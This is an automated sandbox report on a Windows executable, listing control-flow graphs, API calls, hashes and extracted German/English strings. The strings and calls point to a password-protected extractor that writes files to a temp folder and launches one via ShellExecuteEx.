                                        control_flow_graph 0 401000-401124 memset GetModuleHandleA HeapCreate call 403000 call 407470 call 406807 call 406040 call 404ab3 call 4040e0 call 403d90 call 40393b call 403694 call 403ef0 call 403060 call 4030a0 call 403dc0 GetUserDefaultLangID VerLanguageNameA CharLowerA call 403de0 call 4030f0 call 403e30 call 4074c0 35 40112a-4011fa call 403108 * 13 0->35 36 4011ff-4012ca call 403108 * 13 0->36 88 4012cf-4012d9 call 403cd7 35->88 36->88 91 4012f6-401323 call 403b70 call 403a66 GetModuleHandleA 88->91 92 4012db-401b9f call 4036a2 88->92 101 401325 91->101 102 40138a-40139c call 4020b1 91->102 99 401ba4-401bb4 ExitProcess HeapDestroy ExitProcess 92->99 104 40132f-40133c 101->104 107 4013b5-4013d0 call 4036a2 102->107 108 40139e-4013e7 call 401bdd call 4020b1 102->108 104->102 106 40133e-401388 call 4074f0 * 2 call 403a18 call 4074f0 call 4030f0 104->106 106->104 107->99 122 4013e9-401441 call 403de0 call 4030f0 call 4020b1 108->122 123 40140f-40142a call 4036a2 108->123 137 401463-40147e call 4036a2 122->137 138 401443-401495 call 4020b1 122->138 123->99 137->99 144 4014b5-4014c7 call 4020b1 138->144 145 401497-4014b0 138->145 148 4014e7-4014f9 call 4020b1 144->148 149 4014c9-4014e2 144->149 145->144 152 401756-4017b0 call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020b1 148->152 153 4014ff-4015b0 call 404de6 call 4042bd call 4043ae call 4045b3 call 404e09 call 4045d3 148->153 149->148 174 401a25-401a69 call 4074f0 * 3 call 4030f0 call 406170 152->174 175 4017b6-4017fe call 403a18 call 403de0 call 4074c0 152->175 179 4015b5-4015c3 call 40505e 153->179 219 401a87-401ac0 call 405ea0 call 402025 call 4036a2 _rmdir 174->219 220 401a6b-401ad2 call 406250 call 405fd0 call 4074c0 174->220 199 401800-401809 175->199 200 401812 175->200 188 4015e2-4015ea 179->188 189 4015c5-4015d8 _rmdir 179->189 192 40162b-401633 188->192 193 4015ec-4015fa call 405066 188->193 189->99 195 401672-401673 192->195 196 401635-401643 call 405074 192->196 204 401628-401629 193->204 205 4015fc-401626 call 4045fc call 4030f0 call 404925 193->205 195->179 211 401671 196->211 212 401645-40166f call 4045fc call 4030f0 call 404925 196->212 199->200 206 40180b-401810 199->206 208 401814-401816 200->208 204->195 242 401678-4016cd call 4031f0 call 406860 call 403de0 call 4074c0 205->242 206->208 208->174 213 40181c-401863 call 405dd5 call 4036f8 call 4030f0 call 4074c0 208->213 211->195 212->242 252 4019c6-401a20 call 403a79 call 405e15 call 405e90 _rmdir 213->252 253 401869-401893 call 4074f0 call 4030f0 call 4074c0 213->253 219->99 257 401ad4-401ada call 402118 220->257 258 401adf-401b92 call 4074f0 * 2 call 402761 call 402025 call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 220->258 281 4016fd-40170f call 4020b1 242->281 282 4016cf-4016f8 call 4036a2 _rmdir 242->282 252->99 285 4018a0-4018b2 call 406230 253->285 286 401895-40189b call 402118 253->286 257->258 258->99 294 401711-401716 281->294 295 40171b-401751 call 401d3f 281->295 282->99 297 401998-4019aa call 406170 285->297 298 4018b8-401937 call 405fd0 call 4074f0 * 5 call 4036a2 285->298 286->285 294->295 295->152 297->252 308 4019ac-4019c1 call 406250 call 405fd0 297->308 298->297 328 401939-401993 call 403a79 call 405e15 call 405e90 _rmdir 298->328 308->252 328->99
                                        APIs
                                        • memset.MSVCRT ref: 0040100F
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040101C
                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                          • Part of subcall function 00407470: HeapCreate.KERNELBASE(00000001,00001000,00000000), ref: 0040747C
                                          • Part of subcall function 00407470: RtlAllocateHeap.NTDLL(00A30000,00000001,00004104), ref: 004074AA
                                          • Part of subcall function 00406807: HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                          • Part of subcall function 00404AB3: LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                          • Part of subcall function 00404AB3: LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                          • Part of subcall function 004040E0: RtlInitializeCriticalSection.NTDLL(0040B40C), ref: 004040EA
                                          • Part of subcall function 004040E0: GetStockObject.GDI32(00000011), ref: 004040F2
                                          • Part of subcall function 004040E0: memset.MSVCRT ref: 0040412E
                                          • Part of subcall function 00403D90: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                          • Part of subcall function 0040393B: RtlInitializeCriticalSection.NTDLL(0040B3B8), ref: 00403950
                                          • Part of subcall function 00403694: 6F551CD0.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                          • Part of subcall function 00403694: CoInitialize.OLE32(00000000), ref: 0040369B
                                          • Part of subcall function 00403EF0: RtlAllocateHeap.NTDLL(00000000,0000002C), ref: 00403EFD
                                          • Part of subcall function 00403060: HeapFree.KERNEL32(00000000,00A412C8,00000000,004010A6,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 00403091
                                          • Part of subcall function 004030A0: RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                          • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(02460000,00000008,00000000), ref: 00403DD1
                                        • GetUserDefaultLangID.KERNEL32(00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010CF
                                        • VerLanguageNameA.KERNEL32(00000000,00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010D5
                                        • CharLowerA.USER32(00000000,00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010E0
                                          • Part of subcall function 00403E30: HeapFree.KERNEL32(02460000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000), ref: 00401311
                                          • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                          • Part of subcall function 00403A18: strncpy.MSVCRT ref: 00403A53
                                          • Part of subcall function 004036A2: MessageBoxA.USER32(00000000,00000010,00000000,?), ref: 004036BC
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                        • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Heap$AllocateCreate$Initialize$CriticalExitFreeHandleLoadModuleProcessSectionmemset$CharCursorDefaultDestroyF551IconLangLanguageLowerMessageNameObjectStockUserstrlenstrncpy
                                        • String ID: already exists in the current directory. Overwrite?$2$An unknown error occured. The program will be terminated.$Bitte geben Sie das Passwort ein.$Bitte whlen Sie einen Ordner zum Speichern der Dateien aus.$Can not allocate the memory.$Can not create some of your include files.$Choose a location to save the files.$Continue?$Die Datei $Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.$Einige Include Dateien konnten nicht erstellt werden.$Error!$Falsches Passwort.$Fehler!$Fortfahren?$Overwrite?$Password$Passwort$Please enter the password.$The file $This program is not supported on this operating system.$Wrong password.$\BDFINOPS$deutsch$lB$lB$lB
                                        • API String ID: 286559185-4283426436
                                        • Opcode ID: b87e312f4a3ab50c574789bf58b01b54171b153885240daef0a9f98a2e0d008c
                                        • Instruction ID: 2bde32f427d2b7eddb3ed1bd728a16dca1821eacaa3ecb70a8e4e83947eaff11
                                        • Opcode Fuzzy Hash: b87e312f4a3ab50c574789bf58b01b54171b153885240daef0a9f98a2e0d008c
                                        • Instruction Fuzzy Hash: 01423E71250204ABD700BF61EE62E2A3B65FB48349F50403BFA407E2F6DB7959119B9E
                                        Function 00405EB2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(00A30000,00000001,00A30700,000040FF), ref: 00407797
                                        • GetTempPathA.KERNEL32(00000104,00000000,00000104,004013B3,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                        • LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405ED6
                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                        • GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3), ref: 00405EF5
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405EFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTemp
                                        • String ID: GetLongPathNameA$Kernel32.DLL
                                        • API String ID: 752937943-822094646
                                        • Opcode ID: f2ba6410edf8bde28fa5554e8a9c22902d5f8ca1b7105de9d70a6170c437be0b
                                        • Instruction ID: 3562a466a888384f8ba7b5ae80b98f608e44e67bd8cf52f83c325266dc9a6611
                                        • Opcode Fuzzy Hash: f2ba6410edf8bde28fa5554e8a9c22902d5f8ca1b7105de9d70a6170c437be0b
                                        • Instruction Fuzzy Hash: 5CF0B4722012142BC32127755D4CF6F3A6CCB82751B04003AF944B2142CE7D5D1082BE
                                        Function 00402761 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 359 402761-402763 360 402768-402773 359->360 360->360 361 402775-4027de call 403100 * 3 ShellExecuteEx 360->361 368 4027e2-4027ff Sleep GetExitCodeProcess 361->368 369 402801-40280b 368->369 370 40280f 368->370 369->370 371 40280d-402839 call 407550 * 3 369->371 370->368
                                        APIs
                                        • ShellExecuteEx.SHELL32(?), ref: 004027D9
                                        • Sleep.KERNEL32(00000019), ref: 004027E7
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004027F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CodeExecuteExitProcessShellSleep
                                        • String ID: open
                                        • API String ID: 3887608683-2758837156
                                        • Opcode ID: 52a67e558ad29990cc8f225169e9bbe56d7f2f31611fe38e94e8209ad79b84ad
                                        • Instruction ID: 26639f79705cc0b5153d4f828301450fc79178279bf791e28a5e3737258c8c49
                                        • Opcode Fuzzy Hash: 52a67e558ad29990cc8f225169e9bbe56d7f2f31611fe38e94e8209ad79b84ad
                                        • Instruction Fuzzy Hash: 41216A71008209AFC700EF15C845A9FBBE8FB84304F00883EF598662D0D779EA15CB56
                                        Function 00406330 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 380 406330-406343 381 406365-40636e 380->381 382 406345-406362 SetFilePointer 380->382 383 406370-40637d 381->383 384 4063de-4063e9 call 405f90 381->384 382->381 386 4063cb-4063db 383->386 387 40637f-406382 383->387 391 40640b-40642a memcpy 384->391 392 4063eb-406408 WriteFile 384->392 389 406384-406387 387->389 390 4063b6-4063c8 387->390 393 4063a3-4063b3 389->393 394 406389-4063a0 memcpy 389->394
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,00000000,00000001,?,?,?,00406298,00000000,?,?,?,00A405B8,00000000), ref: 00406352
                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,00406298,00000000,?,?,?,00A405B8,00000000,?,?,00401A7B), ref: 00406390
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: FilePointermemcpy
                                        • String ID:
                                        • API String ID: 1104741977-0
                                        • Opcode ID: 871ba12d0a710b8b10be5d67f70c539bcef7555e48d6414b570282c5163502cc
                                        • Instruction ID: f3a8af50231a035adb1325dfd7a6e35cec90defb10c0b62dd41d6b31aad5b5db
                                        • Opcode Fuzzy Hash: 871ba12d0a710b8b10be5d67f70c539bcef7555e48d6414b570282c5163502cc
                                        • Instruction Fuzzy Hash: 09316C763006009FC224DF2AD448E5BF7E9EFD4321F14C82EE69697B90C634E854CBA6
                                        Function 004015DD Relevance: 6.0, APIs: 4, Instructions: 25memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 395 4015dd 396 401672-401673 call 40505e 395->396 400 4015e2-4015ea 396->400 401 4015c5-4015d8 _rmdir 396->401 403 40162b-401633 400->403 404 4015ec-4015fa call 405066 400->404 402 401ba4-401bb4 ExitProcess HeapDestroy ExitProcess 401->402 403->396 405 401635-401643 call 405074 403->405 409 401628-401629 404->409 410 4015fc-401626 call 4045fc call 4030f0 call 404925 404->410 413 401671 405->413 414 401645-40166f call 4045fc call 4030f0 call 404925 405->414 409->396 426 401678-4016cd call 4031f0 call 406860 call 403de0 call 4074c0 410->426 413->396 414->426 435 4016fd-40170f call 4020b1 426->435 436 4016cf-4016f8 call 4036a2 _rmdir 426->436 441 401711-401716 435->441 442 40171b-4017b0 call 401d3f call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020b1 435->442 436->402 441->442 455 401a25-401a69 call 4074f0 * 3 call 4030f0 call 406170 442->455 456 4017b6-4017fe call 403a18 call 403de0 call 4074c0 442->456 479 401a87-401ac0 call 405ea0 call 402025 call 4036a2 _rmdir 455->479 480 401a6b-401ad2 call 406250 call 405fd0 call 4074c0 455->480 469 401800-401809 456->469 470 401812 456->470 469->470 472 40180b-401810 469->472 473 401814-401816 470->473 472->473 473->455 475 40181c-401863 call 405dd5 call 4036f8 call 4030f0 call 4074c0 473->475 500 4019c6-401a20 call 403a79 call 405e15 call 405e90 _rmdir 475->500 501 401869-401893 call 4074f0 call 4030f0 call 4074c0 475->501 479->402 504 401ad4-401ada call 402118 480->504 505 401adf-401b92 call 4074f0 * 2 call 402761 call 402025 call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 480->505 500->402 524 4018a0-4018b2 call 406230 501->524 525 401895-40189b call 402118 501->525 504->505 505->402 531 401998-4019aa call 406170 524->531 532 4018b8-401937 call 405fd0 call 4074f0 * 5 call 4036a2 524->532 525->524 531->500 541 4019ac-4019c1 call 406250 call 405fd0 531->541 532->531 561 401939-401993 call 403a79 call 405e15 call 405e90 _rmdir 532->561 541->500 561->402
                                        APIs
                                        • _rmdir.MSVCRT ref: 004015CB
                                        • _rmdir.MSVCRT ref: 004016EB
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                        • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ExitProcess_rmdir$DestroyHeap
                                        • String ID:
                                        • API String ID: 2349447675-0
                                        • Opcode ID: 7ff438dc2005f445c1573f8959bcff76347286a518e84f97cfc343a5507eee76
                                        • Instruction ID: f6203454605ce15a78fc4500694886718a1945bc82ad3b924abf98fa16e55a6a
                                        • Opcode Fuzzy Hash: 7ff438dc2005f445c1573f8959bcff76347286a518e84f97cfc343a5507eee76
                                        • Instruction Fuzzy Hash: B0E01A71114110D5D9407BB3AD83A5E392C9F4831DF50847FF242781F39A7E5655257F
                                        Function 00401B95 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 568 401b95-401bb4 FreeLibrary ExitProcess HeapDestroy ExitProcess
                                        APIs
                                        • FreeLibrary.KERNEL32 ref: 00401B9A
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                        • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ExitProcess$DestroyFreeHeapLibrary
                                        • String ID:
                                        • API String ID: 2053948195-0
                                        • Opcode ID: 5d7a21f33115fc00b4ce899fd08eef21c097241319e4cbf2c865bc4fb831db85
                                        • Instruction ID: 8df1d9b4a75efc814e8b2774fb98a4c810adc8e8576d79e7d4d7b84f580b8b4c
                                        • Opcode Fuzzy Hash: 5d7a21f33115fc00b4ce899fd08eef21c097241319e4cbf2c865bc4fb831db85
                                        • Instruction Fuzzy Hash: 85D092701A051184D9407BF35803A4D2C1C4F8870EB4180BFB651381E38E3C4314157F
                                        Function 00406170 Relevance: 4.6, APIs: 3, Instructions: 72filememoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 571 406170-4061ab call 40662c CreateFileA 574 4061c6-4061c8 571->574 575 4061ad-4061c4 CreateFileA 571->575 576 406211-406216 574->576 577 4061ca-4061fd RtlAllocateHeap 574->577 575->574 575->576 580 406224-40622a 576->580 581 406218-40621f call 4066bb 576->581 578 406208-40620e 577->578 579 4061ff-406205 577->579 581->580
                                        APIs
                                        • CreateFileA.KERNELBASE(00000000,C0000000,00000001,00000000,00000002,00000080,00000000,00A405B8,00000000,?,?,?,00000000,00401A67,00000001,00000000), ref: 004061A4
                                        • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000005,00000000,00000000,?,?,?,00000000,00401A67,00000001,00000000,00000000,0040A0C8), ref: 004061BD
                                        • RtlAllocateHeap.NTDLL(00A40000,00000000,00001000), ref: 004061DA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateFile$AllocateHeap
                                        • String ID:
                                        • API String ID: 2813278966-0
                                        • Opcode ID: 37aa71c942510c7026b4bd5c517740329cdb7b4c424b667147bc97f85931557e
                                        • Instruction ID: cfaef28ad908b1f0d4b3848689bff36785735015fc1d85a617d71e6b06036d25
                                        • Opcode Fuzzy Hash: 37aa71c942510c7026b4bd5c517740329cdb7b4c424b667147bc97f85931557e
                                        • Instruction Fuzzy Hash: C911B67234030066D230AB69AD49F57B798D790B71F11872AF3A1BB2D1C7B6A8548768
                                        Function 00405F13 Relevance: 4.5, APIs: 3, Instructions: 38stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 583 405f13-405f20 584 405f22-405f50 strncpy strlen 583->584 585 405f86 583->585 587 405f68-405f70 584->587 586 405f88-405f89 585->586 588 405f52-405f5a 587->588 589 405f72-405f84 CreateDirectoryA 587->589 590 405f66 588->590 591 405f5c-405f5f 588->591 589->586 590->587 591->590 592 405f61-405f64 591->592 592->589 592->590
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateDirectorystrlenstrncpy
                                        • String ID:
                                        • API String ID: 2535372781-0
                                        • Opcode ID: 8001b25660f552bfb8bc346aeba8b70798e5ff3e20decd252b64886d137bc1f8
                                        • Instruction ID: e2a7ac9b00687a60ad497853f81a50efedb75a5df88c79b9acbfe651115fb43f
                                        • Opcode Fuzzy Hash: 8001b25660f552bfb8bc346aeba8b70798e5ff3e20decd252b64886d137bc1f8
                                        • Instruction Fuzzy Hash: 0401F9319086099EDB21DA24CC89BEB77B99B10344F5400B6E5C4E61D1DBBC9AC8CF1A
                                        Function 004066F1 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 593 4066f1-406737 RtlAllocateHeap * 2
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 0040672E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 8949d9c54749204bb44548e3168ae262ece6588501e9efe4df11175648cca151
                                        • Instruction ID: 97085aaf5d90ff1175411855662eb62e74a246e0554bdcf5be02ff30625659a3
                                        • Opcode Fuzzy Hash: 8949d9c54749204bb44548e3168ae262ece6588501e9efe4df11175648cca151
                                        • Instruction Fuzzy Hash: 6CF0F871244701DFD324CF1ADD01B1AFBE8FB94710F01C82EE0A9976A0D7B0A8058F94
                                        Function 00404AB3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                          • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,?), ref: 0040672E
                                          • Part of subcall function 00406434: RtlAllocateHeap.NTDLL(00000008,?), ref: 00406441
                                        • LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap$Load$CursorIcon
                                        • String ID:
                                        • API String ID: 1647777986-0
                                        • Opcode ID: ead3a737e6ccaa73f164d46f45ae259ba4949eb801cbd4beae9f9b9d72db2312
                                        • Instruction ID: e4af23a66d80ce1c901330b9548954eb4d527ddcbf43722768b30e59ae099efb
                                        • Opcode Fuzzy Hash: ead3a737e6ccaa73f164d46f45ae259ba4949eb801cbd4beae9f9b9d72db2312
                                        • Instruction Fuzzy Hash: 55F0EDB0B81305BAEB106B719E47F5636A0E704F05FA0843BB6017A6E2DBF95110AF9D
